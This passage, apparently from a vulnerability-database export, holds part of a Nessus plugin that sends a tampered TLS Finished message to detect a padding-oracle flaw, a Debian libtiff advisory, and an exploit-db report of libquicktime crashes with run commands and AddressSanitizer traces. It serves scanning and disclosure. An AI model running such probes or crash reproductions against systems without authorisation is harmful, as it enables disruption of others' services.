\"dh_kx\", \"Server selected DH key exchange but didn't provide a ServerKeyExchange\"];\n }\n\n # Generate the client private key,\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret.\n premaster = bn_mod_exp(skex['dh_y'], dh_privkey, skex['dh_p']);\n\n # Encode the client's DH public key\n ckex = ssl_vldata_put(\n data:bn_mod_exp(skex['dh_g'], dh_privkey, skex['dh_p']),\n len:2\n );\n }\n else if (cipher_desc =~ \"Kx=ECDH[(|]\" && ecc_functions_available())\n {\n if (isnull(skex))\n {\n close(soc);\n return [FALSE, \"ecdh_kx\", \"Server selected ECDHE key exchange but didn't provide a ServerKeyExchange\"];\n }\n\n # Generate the client private key\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret\n premaster = ecc_scalar_multiply(\n curve_nid:curve_nid.tls[skex['named_curve']],\n scalar:dh_privkey,\n x:substr(skex['pubkey'], 1, (strlen(skex['pubkey'])) / 2),\n y:substr(skex['pubkey'], (strlen(skex['pubkey']) / 2) + 1)\n );\n # Just the X coordinate of the curve point is used\n premaster = ecc_fe2osp(element:premaster.x, curve_nid:curve_nid.tls[skex['named_curve']]);\n\n pubkey = ecc_scalar_multiply(\n curve_nid:curve_nid.tls[skex['named_curve']],\n scalar:dh_privkey\n );\n\n pubkey.x = ecc_fe2osp(element:pubkey.x, curve_nid:curve_nid.tls[skex['named_curve']]);\n pubkey.y = ecc_fe2osp(element:pubkey.y, curve_nid:curve_nid.tls[skex['named_curve']]);\n\n ckex = ssl_vldata_put(\n # Uncompressed curve point encoding\n data:'\\x04' + pubkey.x + pubkey.y,\n len:1\n );\n }\n else\n {\n close(soc);\n return [FALSE, \"kx\", \"Unsupported key exchange method\"];\n }\n\n # Create a ClientKeyExchange record\n data += ssl_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE,\n data:ckex\n )\n );\n\n tls_keys = tls_set_keys(\n cipher_desc:cipher_desc,\n keyblk:ssl_derive_keyblk(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n master:ssl_calc_master(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n premaster:premaster\n )\n )\n );\n\n if (tls_keys == FALSE)\n {\n close(soc);\n return [FALSE, \"kx\", \"Failed to make TLS keys from key exchange\"];\n }\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC,\n data:mkbyte(1),\n version:version\n );\n\n # Use a random IV, as it's included explicitly in TLS 1.1\n if (version >= TLS_11)\n tls_keys['enc_iv'] = rand_str(length:strlen(tls_keys['enc_iv']));\n\n # Finished message.\n # We make a record of just bad padding to trigger a RECORD_OVERFLOW alert.\n # 48 bytes of padding because:\n # o Must be a multiple of AES block size (16 bytes).\n # o Must be at least one byte bigger than the MAC size.\n # o SHA1 is 20 bytes, SHA256 is 32 bytes, so we round up to 48.\n # o SHA384 ciphersuites are not vulnerable.\n tls_ciphertext = aes_cbc_encrypt(\n data:crap(data:'\\xff', length:48),\n iv:tls_keys['enc_iv'],\n key:tls_keys['enc_key']\n );\n # aes_cbc_encrypt() returns an array, [0] is ciphertext, [1] is CBC\n # residue (for TLS 1.0 IV). We don't retain the residue because we\n # don't intent to send any more records.\n tls_ciphertext = tls_ciphertext[0];\n\n # TLS 1.1 explicitly includes the IV in each record\n if (version >= TLS_11)\n tls_ciphertext = tls_keys['enc_iv'] + tls_ciphertext;\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n data:tls_ciphertext,\n version:version\n );\n\n # Send the ChangeCipherSpec and tampered Finished message\n send(socket:soc, data:data);\n\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"post_attack\", \"Server did not send an alert when sent a crafted Finished message\"];\n }\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n\n if (!isnull(rec))\n {\n close(soc);\n if (rec['level'] == 2 && rec['description'] == SSL3_ALERT_TYPE_RECORD_OVERFLOW)\n return [TRUE, \"post_attack\", \"Server sent RECORD_OVERFLOW alert\"];\n else\n return [FALSE, \"post_attack\", \"Server sent alert to tampered Finished. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n}\n\nget_kb_item_or_exit('SSL/Supported');\n\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\n\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port, \"TCP\");\n\n# Ciphersuites should basically be the \"Cartesian product\" of:\n# * DHE and RSA key exchanges\n# * AES-CBC with 128- and 256-bit keys\n# * SHA1 and SHA256 HMACs (SHA384 ciphersuites are not vulnerable)\n# TODO: should support ECDHE and ECDSA, once we can do that from NASL.\n\n# We test SHA1 separately from SHA256 and check if *either* was\n# vulnerable, because vulnerable 1.0.1 servers support SHA256 but are\n# only vulnerable on SHA1 ciphersuites. If we offered SHA1 and SHA256\n# at the same time and the server preferred SHA256, it'd be a false\n# negative.\n\ncipher_list_sha1 =\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] + # <- Required by all TLS 1.2 impls.\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA'];\n\ncipher_list_sha256 =\n ciphers['TLS1_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_RSA_WITH_AES_256_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_128_CBC_SHA256'] +\n ciphers['TLS1_DHE_RSA_WITH_AES_256_CBC_SHA256'];\n\nif (ecc_functions_available())\n{\n cipher_list_sha1 +=\n ciphers[\"TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA\"] +\n ciphers[\"TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA\"];\n\n cipher_list_sha256 +=\n ciphers[\"TLS1_ECDHE_RSA_WITH_AES_128_CBC_SHA256\"] +\n ciphers[\"TLS1_ECDHE_RSA_WITH_AES_256_CBC_SHA256\"];\n}\n\nsha1_result = attack(port:port, ciphers:cipher_list_sha1);\n\n# Only do SHA256 test if we didn't find a vuln with SHA1.\nif (sha1_result[0] == FALSE)\n sha256_result = attack(port:port, ciphers:cipher_list_sha256);\n\nif (sha1_result[0] == TRUE || sha256_result[0] == TRUE)\n{\n security_report_v4(\n port:port,\n severity:SECURITY_NOTE,\n extra:\n 'Nessus was able to trigger a RECORD_OVERFLOW alert in the\\n' +\n 'remote service by sending a crafted SSL \"Finished\" message.'\n );\n}\nelse\n{\n exit(0,\n \"[Port \" + port + \"] \" +\n \"SHA1 test: \" + sha1_result[1] + \": \" + sha1_result[2] + \". \" +\n \"SHA256 test: \" + sha256_result[1] + \": \" + sha256_result[2]);\n}\n", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "description": "Package : tiff\nVersion : 4.0.2-6+deb7u16\nCVE ID : CVE-2017-11335 CVE-2017-12944 CVE-2017-13726 CVE-2017-13727\nDebian Bug : 868513 872607 873880 873879\n\n\nSeveral vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\n A heap based buffer overflow via a PlanarConfig=Contig image, which\n causes an out-of-bounds write (related to the ZIPDecode function). A\n crafted input may lead to a remote denial of service attack or an\n arbitrary code execution attack.\n\nCVE-2017-12944\n\n A mishandling of memory allocation for short files allows attackers\n to cause a denial of service (allocation failure and application\n crash) during a tiff2pdf invocation.\n\nCVE-2017-13726\n\n A reachable assertion abort allows a crafted input to lead to a\n remote denial of service attack.\n\nCVE-2017-13727\n\n A reachable assertion abort allows a crafted input to lead to a\n remote denial of service attack.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n4.0.2-6+deb7u16.\n\nWe recommend that you upgrade your tiff packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "modified": "2017-09-10T02:12:42", "published": "2017-09-10T02:12:42", "id": "DEBIAN:DLA-1093-1:BF801", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00010.html", "title": "[SECURITY] [DLA 1093-1] tiff security update", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2017-06-10T00:14:07", "bulletinFamily": "exploit", "description": "libquicktime 1.2.4 - Denial of Service. CVE-2017-9122,CVE-2017-9123,CVE-2017-9124,CVE-2017-9125,CVE-2017-9126,CVE-2017-9127,CVE-2017-9128. Dos exploit for Li...", "modified": "2017-06-09T00:00:00", "published": "2017-06-09T00:00:00", "id": "EDB-ID:42148", "href": "https://www.exploit-db.com/exploits/42148/", "type": "exploitdb", "title": "libquicktime 1.2.4 - Denial of Service", "sourceData": "libquicktime multiple vulnerabilities\r\n\r\n\r\n================\r\nAuthor : qflb.wu\r\n===============\r\n\r\n\r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n\r\n\r\nAffected version:\r\n=====\r\n1.2.4\r\n\r\n\r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n\r\n\r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n\r\n\r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n\r\n\r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at lqt_quicktime.c:1242\r\n1242 return\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n\r\n\r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n\r\n\r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n\r\n\r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n\r\n\r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n\r\n\r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n\r\n\r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n\r\n\r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 